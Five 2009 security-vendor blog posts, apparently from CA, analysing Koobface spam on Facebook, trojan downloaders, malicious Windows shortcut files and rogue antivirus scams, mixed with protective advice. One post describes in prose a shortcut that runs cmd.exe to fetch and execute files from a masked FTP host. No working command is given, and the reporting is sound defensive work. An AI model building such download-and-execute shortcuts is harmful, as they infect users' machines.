Published: May 31 2009, 08:54 PM | no comments
by Methusela Cebrian Ferrer

According to the Nielsen report Global Faces and Networked Places “social networking has been the global consumer phenomenon of 2008. Two-thirds of the world’s internet population visits a social network or blogging site and the sector now accounts for almost 10% of all internet time”. The report also suggests that interest in social networking has surpassed the popularity of emails.

From an information security perspective, this report concurs with our observations regarding the ever increasing number of online threats we are seeing today. Facebook, as the world’s most popular social networking site, cannot escape the attacks targeting its users. 

Win32/Koobface appeared last year and is a family of worms that target MySpace and Facebook users. Since then, this threat has evolved into different versions where it extends its social networking vector as shown in Figure 01.   

                       

                                         Figure 01 – Koobface redirector script routine


Obviously, this redirector script leads to Koobface malware serving website where it will lure its target users to manually install an executable file as shown in Figure 02.

         Figure 02 – Koobface malware serving website offers users to install Adobe Flash Player Installer. 

Apparently, spamming activity in Facebook has been observed increasing since last week.

For more information on Koobface, please refer to our previous blogs listed below:
•    Healthy Malware Server Now Distributing Koobface
•    From Koobface: One Video Message Received

What about Twitter?  The micro-blogging community is enjoying skyrocketing popularity and according to Nielsen, has reported a 1382% increase of unique visitor over year (Feb 08 – Feb 09). Unfortunately this huge surge in popularity has attracted attackers and we have seen serious attacks such as the Mikeyy worm and hacking incidents; there have also been phishing attack and increasing spam activity. 

Furthermore, we are continuously seeing malware (especially relating to porn) and spam distribution through bogus Blogspot blog profiles as shown in Figure 03.  

                                    Figure 03 – Bogus blog profiles

Security researchers are now dealing with different attack vectors and varying technical difficulty. Organized cyber-criminals are mainly builing these attacks through automation to enable massive malware distribution and implementation of server side polymorphism of binaries (EXE, PDF, SWF and etc...) to avoid security scanners detection.

Social networks and growing internet content (such as media) have encouraged users to spend longer time in the internet resulting to greater exposure to internet threats and dramatic increase of malwares.  With this, visitors to social networking sites should be on ‘high alert’ for socially engineered tricks to follow links to sites that could be serving malicious content, even from contacts thought to be trusted.

Futhermore, it is very important for everyone participating in social networking activities to report any suspicious or openly malicious activity to keep the internet safe. 

My acknowledgement to Michael MacGuire and Kim Thorogood for their valuable contribution to this blog post.

Share this post:  Email

Share

Published: May 28 2009, 09:53 PM | no comments
by Zarestel Ferrer

Trojan downloaders have become one of the main malware categories to dominate CA’s malware collection this year. Most of the malware is very small, some may say lightweight, and its only purpose is to download other malware.

Multiple Downloads

If a system is infected with malware that has “downloader” capabilities, it’s highly likely that the malware will fetch some more to install on the system. Below is an image of communication between a piece of malware and its server.

                                              [Figure 1 – Downloader contacting server]

As you can see, when a trojan downloader communicates with its server it can result in multiple downloads of potentially malicious files. Accordingly, the affected machine may be exposed to further attacks. This particular behavior is significantly prevalent in crimeware, which is malware that is generated for financial gain.

Some downloaders employ extra checks when communicating with their servers. As shown on the left-side of Figure 1 the malware files can be downloaded via port 88, not the usual port 80, while the right-side of the image shows that the list of malware is only provided when the  required information is sent via POST to the server.

PDF and SWF downloaders

Exploited PDF and SWF files are also in the list of Trojan downloaders and their numbers have increased significantly due to Server-Side Automation that has been built to auto-generate exploited files.

                                     [ Figure 2 – Snippet of Exploited PDF ]

Check out our previous blog, “Malicious PDF Server Alive and Kicking” for more information.

Rogue Security Software Downloaders

Other notable Trojan downloaders are those that download rogue security software and push fake alert messages.

                              [ Figure 3 – Downloader of Fake Antivirus Programs ]

These type of downloaders typically offer something of interest to unsuspecting users such as fake codecs, porn, and keygens. A downloader may also impersonate a legitimate application such as Flash player.

Below is the HTTP access log after a downloader program, disguised as a porn video provider, downloads a fake antivirus program. The downloader opens the porn site using the default internet browser and in the background downloads a fake antivirus program, in this case it is WinPC Defender.

                                       [ Figure 4 – HTTP access log ]

For more information on rogue security software, take a look at our other blogs:

          Spyware Protect 2009 copies malware descriptions
          Double Jeopardy with Privacy Center
          Warning: Dangerous Software – Antivirus XP Pro
          Don’t Get Caught by the XP Police Antivirus!
          Don’t be Fooled by Rogue Software Lifetime Offer

To be on the safe side, be extra cautious with your daily computer activities and remember to always keep your CA security software up-to-date.

Share this post:  Email

Share

Published: May 27 2009, 10:44 PM | no comments
by Methusela Cebrian Ferrer

Amidst the bulk of malicious executables we deal with everyday, there’s an interesting attack vector using Windows Shortcuts - referred to as LNK files due to their file extension of .LNK.

These are small files that contain information such as the name and path of the target program it represents. Additionally, LNK files can also store information about the file attributes of its target program, local and network location and command line arguments.
                                          
                                   
 

A good example of a very common shortcut file you’ll find on the desktop is Internet Explorer. However, visually recognizing whether it is clean or malicious is not an easy task. As a result, you could easily end up executing the file before realizing that it is suspicious.

In recent cases, malicious LNK files were crafted as Trojan downloaders, sometimes disguised as a legitimate file, program or folder to persuade its target victim to execute it.

                                                                    

Figure 03 shows what you would see if you dragged a malicious LNK file to a text editor such as Notepad:
       


In this example, you’ll find a short argument is passed through cmd.exe, which will connect to a malicious FTP server (ftp://g***.vicp.net) to download and execute ntdet.exe in C:\ and pub.vbs in the Windows directory. This is just one example and it demonstrates how any attacker could craft a malicious LNK file by changing its icon and downloader behavior according to their intent.

Furthermore, Windows users may receive this threat through email, browser exploit and/or bundled with other malicious files.

Take extra precautions with this kind of trick by following our recommendations below:

•  Think twice before clicking on a shortcut file. If in doubt, simply drag the file to Notepad and check for any suspicious strings.
•  Include .LNK extensions in your list of unwanted email attachments; this is a must for enterprise email blocking and filtering administration.
  
•  Stay up to date with software patches to avoid exploit attack vectors. 
  
• Make sure your security software is working and uses the latest signature update.
  

Stay Safe!

Share this post:  Email

Share

Published: May 27 2009, 10:19 PM | no comments
by Zarestel Ferrer

Rogue security software often use skins to change its Graphical User Interface (GUI). This is so a new version can be easily created once the previous version is easily recognizable as fake security software. Sometimes the GUI is a replica of legitimate security software to trick unsuspecting users.

Aside from GUIs, rogue security software also illegally copy malware descriptions from the websites of reputable security vendors. Spyware Protect 2009 rogue security software has been spotted to copy descriptions from the CA Spyware Encyclopedia.

Here are some examples, showing CA’s description first, followed by Spyware Protect 2009’s plagiarized version.

CA

Spyware Protect 2009

In both cases the descriptions are brief - coincidence?

Here is another example.

CA

Spyware Protect 2009

CA is not the only site that Spyware Protect 2009 has copied their malware descriptions from but this highlights how desperate the people behind this rogue security software are to trick users.

Since last week this rogue security software is reported to have been massively distributed through compromised and malicious websites so please be observant.
 
CA detects this malware as Win32/SpywareProtect2009. For a list of files and registries dropped by this rogue security software please refer to CA Spyware Encyclopedia description page.

Share this post:  Email

Share

Published: May 20 2009, 12:25 AM | 1 Comment(s)
by Zarestel Ferrer

                                                   [Figure 1 – Privacy Center GUI]

Recently we were investigating “Privacy Center”, rogue security software (scareware) distributed during the wave of the “nude Rihanna photos”, when we saw the following window.

                                   [Figure 2 – Privacy Center’s Transaction Processing page]

As you can see in Figure 2, this rogue security software costs $79.90; not cheap for a fake.
 
So we checked our website to compare the cost of our legitimate software against the cost of Privacy Center. Interestingly, our software costs around the same amount [Figure 3].

CA Internet Security Suite Plus - license valid for up to 5 PCs for $79.99 plus free PC Optimize Scan.

CA Antivirus Plus CA Antispyware 2009 - license valid for up to 3 PCs for $49.99 plus free PC Optimize Scan.

* prices are correct at time of writing

How many times have we all wondered, when shopping, if the more expensive product is superior quality to the cheaper product? The pricing of this rogue software is tapping into those same consumer insecurities. The distributors of Privacy Center have effectively hidden the rogue software in amongst legitimate security products in the same price range.

                              [Figure 3 – CA Internet Security Suite Plus 2009 webpage]

Going back to the “Privacy Center” scareware, we have noticed a couple of fraudulent claims.

"Secure" Page

                                                     [Figure 4 – Secured Logos]

As you can see in Figure 4, the window displays a “Positive SSL Secured Website” logo, which is not what we saw in the background. Using our set of tools to investigate this claim, we noticed that the process is not using HTTP over SSL, nor is it using HTTPS. Instead, as seen in Figure 5 below, it is using standard HTTP.

                                              [Figure 5 – HTTP transaction]

I have experimented by filling in both the personal information and payment information fields. It is NOT surprising that the personal information sent was transmitted in a clear text format as shown from the sniffed transactions below [Figures 6, 7 & 8].

                                           [Figure 6 – NOT Secure Transaction]

                                                [Figure 7 – Packet Stream]

                                      [Figure 8 – Visible Credit Card Details]

The personal information such as first name, last name, city, country, state, address, zip code, email address and phone number are all in clear text. In addition, the payment information such as card number, expiration date and credit card verification (cvv) value are all visible to the sniffer.

In this scenario, not only has the victim been ripped off by the scareware, something far more sinister has happened. The victim’s personal and payment information had been compromised and could now be used for further scams.

Privacy Center is detected by CA as Win32/PrivacyCenter.A and most of its components are detected as Win32/FakeAV variants.

Protect yourself by keeping your CA Security Products up to date!

*Thanks to Kim Thorogood for her valuable contribution to this blog entry

Share this post:  Email

Share